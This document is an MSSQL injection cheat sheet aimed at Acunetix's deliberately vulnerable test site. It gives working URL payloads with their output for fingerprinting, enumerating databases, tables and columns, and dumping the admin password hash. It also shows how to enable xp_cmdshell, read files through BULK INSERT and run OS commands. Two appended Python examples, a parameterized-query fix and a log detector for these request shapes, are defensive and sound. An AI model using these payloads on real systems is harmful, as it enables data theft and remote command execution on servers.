MSSQL Injection Cheat Sheet

(((0x1 :- Basic Recon Stage)))

UserName
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,user_name())--
acunetix

Check Whether the Parameter Is Injectable (boolean-based)
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=1--   [True]
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=2--   [False]


SQL Server Version
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@version))--
Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) Feb 9 2007 22:47:07 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)



Server Name
http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select @@servername))--
VPS19760

(((0x2 :- Enumerating Other Databases)))

[Listing Database Names]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(1)))--
master

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(2)))--
tempdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(3)))--
model

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(4)))--
msdb

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(5)))--
acublog

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(6)))--
acuforum

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select db_name(7)))--
acuservice



(((0x3 :- Enumerating Table Names for each database)))
[*]Database : [master]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' ),NULL--
spt_fallback_db

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db') ),NULL--
spt_fallback_dev

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev') ),NULL--
spt_fallback_usg

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM master..sysobjects WHERE xtype = 'U' AND name not in ('spt_fallback_db','spt_fallback_dev','spt_fallback_usg') ),NULL--
spt_monitor

The same pattern continues: each returned name is appended to the NOT IN list until the query returns nothing, which means every user table (xtype = 'U') has been listed.

[*]Database : [acublog]

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' ),NULL--
comments



http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments') ),NULL--
news


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acublog..sysobjects WHERE xtype = 'U' AND name not in ('comments','news') ),NULL--
users

[*]Database : [acuforum]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' ),NULL--




[*]Database : [acuservice]
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuservice..sysobjects WHERE xtype = 'U' ),NULL--
threads

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads')),NULL--
users

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users')),NULL--
forums

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 UNION ALL SELECT (SELECT top 1 name FROM acuforum..sysobjects WHERE xtype = 'U' AND name not in ('threads','users','forums')),NULL--
posts


The same pattern continues for the remaining tables.



(((0x4 :- Fetching Column Names for Tables in the Same and Other Databases)))
[*]Database : [acublog]

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' ))--
uname

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname') ))--
upass

http://testasp.vulnweb.com/showforum.asp?id=0+and+1=convert(int,(select top 1 acublog..syscolumns.name FROM acublog..syscolumns, acublog..sysobjects WHERE acublog..syscolumns.id=acublog..sysobjects.id AND acublog..sysobjects.name='users' AND acublog..syscolumns.name NOT IN ('uname','upass') ))--
alevel


The same approach works for the other tables and databases: join syscolumns to sysobjects on id, filter by table name, and grow the NOT IN list one column at a time.

(((0x5 :- Fetching Data from Columns)))
http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users;
admin

http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select upass,null from acublog.dbo.users;
334c4a4c42fdb79d7ebc3e73b517e6f8


http://testasp.vulnweb.com/showforum.asp?id=0 and 1=2 union all select uname,null from acublog.dbo.users WHERE uname NOT IN ('admin'); 
[Returns nothing here because admin is the only row; the growing NOT IN list is the way to walk further rows when there are more to fetch]

(((0x6 :- Enable xp_cmdshell if current_user is 'sa')))
For a string parameter:
http://testasp.vulnweb.com/showforum.asp?name=test'; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--

For an integer parameter:
http://testasp.vulnweb.com/showforum.asp?id=0; EXEC sp_configure 'show advanced options',1 ; RECONFIGURE ; EXEC sp_configure 'xp_cmdshell',1 ; RECONFIGURE ;--
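The string and integer payloads above both work because the raw parameter is pasted into the statement text. The following is an added example, not the test site's code, showing the flawed integer-id handler beside its hardened form; sqlite3 stands in for the SQL Server backend so it runs offline, and the table contents are constructed. The validate-then-bind pattern is the same with pyodbc or pymssql against MSSQL.

```python
"""Integer 'id' handler: vulnerable concatenation beside the hardened form.

Added example, not the test site's code. sqlite3 stands in for the MSSQL
backend so the script runs offline; the strict validation plus bound
parameter is the same with pyodbc or pymssql against SQL Server.
"""
import re
import sqlite3

# Plain decimal, bounded length, no sign, whitespace, comment or semicolon.
FORUM_ID_RE = re.compile(r"^[0-9]{1,9}$")


def validate_forum_id(raw):
    """Accept only a plain decimal integer. Anything else, including the
    '0 and 1=1--' probe or a stacked '0; EXEC ...', raises ValueError."""
    if not FORUM_ID_RE.match(raw):
        raise ValueError(f"invalid forum id: {raw!r}")
    return int(raw)


def setup_demo_db():
    """Constructed in-memory table standing in for the forum database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE forums (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO forums VALUES (?, ?)",
                     [(1, "general"), (2, "support")])
    return conn


def vulnerable_lookup(conn, raw):
    """The flawed pattern: the raw parameter becomes part of the statement, so
    '1 and 1=1' and '1 and 1=2' give different answers (the True/False probe)."""
    row = conn.execute("SELECT name FROM forums WHERE id = " + raw).fetchone()
    return row[0] if row else None


def safe_lookup(conn, raw):
    """Hardened: validate the type first, then bind the value as a parameter
    so the driver sends it as data, never as SQL text."""
    try:
        forum_id = validate_forum_id(raw)
    except ValueError:
        return None  # answer the client with 400; the database is never reached
    row = conn.execute("SELECT name FROM forums WHERE id = ?", (forum_id,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = setup_demo_db()
    for value in ("1", "1 and 1=1", "1 and 1=2", "0; EXEC sp_configure 'xp_cmdshell',1"):
        print(f"{value!r:45} vulnerable={vulnerable_lookup(db, value) if value.startswith('1') else 'n/a'} "
              f"safe={safe_lookup(db, value)}")
```

The hardened function rejects the input before any SQL is built, so the `convert(int, ...)` error-based trick and the stacked `; EXEC` form never reach the server; the bound parameter is the second layer in case validation is ever loosened.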


(((0x7 :- Reading a Local File into a Table)))

CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'C:\output.txt';
DROP TABLE mydata;

(((0x8 :- Execute a Command Shell)))
'; exec xp_cmdshell 'net user > c:\output.txt';--
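Every stage on this page leaves a distinctive request shape in the web server log: the `and 1=1--` / `and 1=2--` probe, `convert(int, ...)` error-based reads of `@@version`, `@@servername` and `db_name()`, `UNION ALL SELECT` against `sysobjects` / `syscolumns` with a growing `NOT IN` list, direct column extraction, and stacked `sp_configure` / `xp_cmdshell` / `BULK INSERT` statements. The following is an added detection example, not part of the cheat sheet, run over constructed log lines in a simplified IIS/W3C layout (date, time, client IP, URI stem, URI query, status); the stage labels and regexes are this example's own choices.

```python
"""Classify web-server requests by the MSSQL injection stage they exhibit.

Added detection example (not part of the cheat sheet): the regexes match the
request shapes the cheat sheet shows, run over constructed log lines in a
simplified IIS/W3C layout: date time client-ip uri-stem uri-query status.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log; the queries mirror the cheat sheet's payload shapes.
SAMPLE_LOG = """\
2023-01-01 10:00:01 203.0.113.5 /showforum.asp id=1 200
2023-01-01 10:00:02 203.0.113.5 /showforum.asp id=0+and+1=1-- 200
2023-01-01 10:00:03 203.0.113.5 /showforum.asp id=0+and+1=convert(int,(select+@@version))-- 500
2023-01-01 10:00:04 203.0.113.5 /showforum.asp id=0+and+1=convert(int,(select+db_name(1)))-- 500
2023-01-01 10:00:05 203.0.113.5 /showforum.asp id=0+and+1=2+UNION+ALL+SELECT+(SELECT+top+1+name+FROM+acublog..sysobjects+WHERE+xtype%3D'U'+AND+name+not+in+('comments')),NULL-- 200
2023-01-01 10:00:06 203.0.113.5 /showforum.asp id=0+and+1=2+union+all+select+upass,null+from+acublog.dbo.users 200
2023-01-01 10:00:07 203.0.113.5 /showforum.asp id=0;+EXEC+sp_configure+'xp_cmdshell',1;+RECONFIGURE;-- 200
2023-01-01 10:00:08 198.51.100.7 /showforum.asp id=42 200
"""

# Each stage is a (label, pattern) pair; one request may match several.
STAGE_PATTERNS = [
    ("boolean-probe",      re.compile(r"\band\s+1\s*=\s*[12]\s*--", re.I)),
    ("error-based-recon",  re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),
    ("server-fingerprint", re.compile(r"@@(version|servername)\b|\buser_name\s*\(", re.I)),
    ("database-enum",      re.compile(r"\bdb_name\s*\(", re.I)),
    ("schema-enum",        re.compile(r"\bsys(objects|columns)\b", re.I)),
    ("union-extraction",   re.compile(r"\bunion\s+all\s+select\b", re.I)),
    ("stacked-command",    re.compile(r"\b(sp_configure|xp_cmdshell|bulk\s+insert)\b", re.I)),
]

LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def parse_line(line):
    """Return a dict for one log line with the query URL-decoded, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = unquote_plus(rec["query"])  # '+' and %xx become plain text
    rec["status"] = int(rec["status"])
    return rec


def classify(query):
    """List every stage label whose pattern matches the decoded query string."""
    return [label for label, pat in STAGE_PATTERNS if pat.search(query)]


def scan_log(text):
    """Return one finding per request that matches at least one stage."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stages = classify(rec["query"])
        if stages:
            findings.append({
                "time": f'{rec["date"]} {rec["time"]}',
                "ip": rec["ip"],
                "status": rec["status"],   # 500 next to convert(int,...) = error channel is open
                "stages": stages,
                "query": rec["query"],
            })
    return findings


def stages_by_client(findings):
    """Collapse findings to client IP -> set of stages. A client that walks
    several stages (probe, fingerprint, enumerate, extract, command) is the
    signal worth paging on; a lone hit may be a scanner or a false positive."""
    seen = defaultdict(set)
    for f in findings:
        seen[f["ip"]].update(f["stages"])
    return dict(seen)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["time"]} {f["ip"]} {f["status"]} {",".join(f["stages"])}  {f["query"]}')
    for ip, stages in stages_by_client(found).items():
        print(f"{ip}: {len(stages)} distinct stages -> {sorted(stages)}")
```

The per-client roll-up matters more than any single regex: the enumeration steps above generate dozens of near-identical requests from one source whose `NOT IN` list grows by one name each time, and a 500 response paired with `convert(int, ...)` confirms the application is leaking conversion errors, which is the fix to prioritise (generic error pages and parameterized queries) alongside leaving `xp_cmdshell` disabled and not running the application as `sa`.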
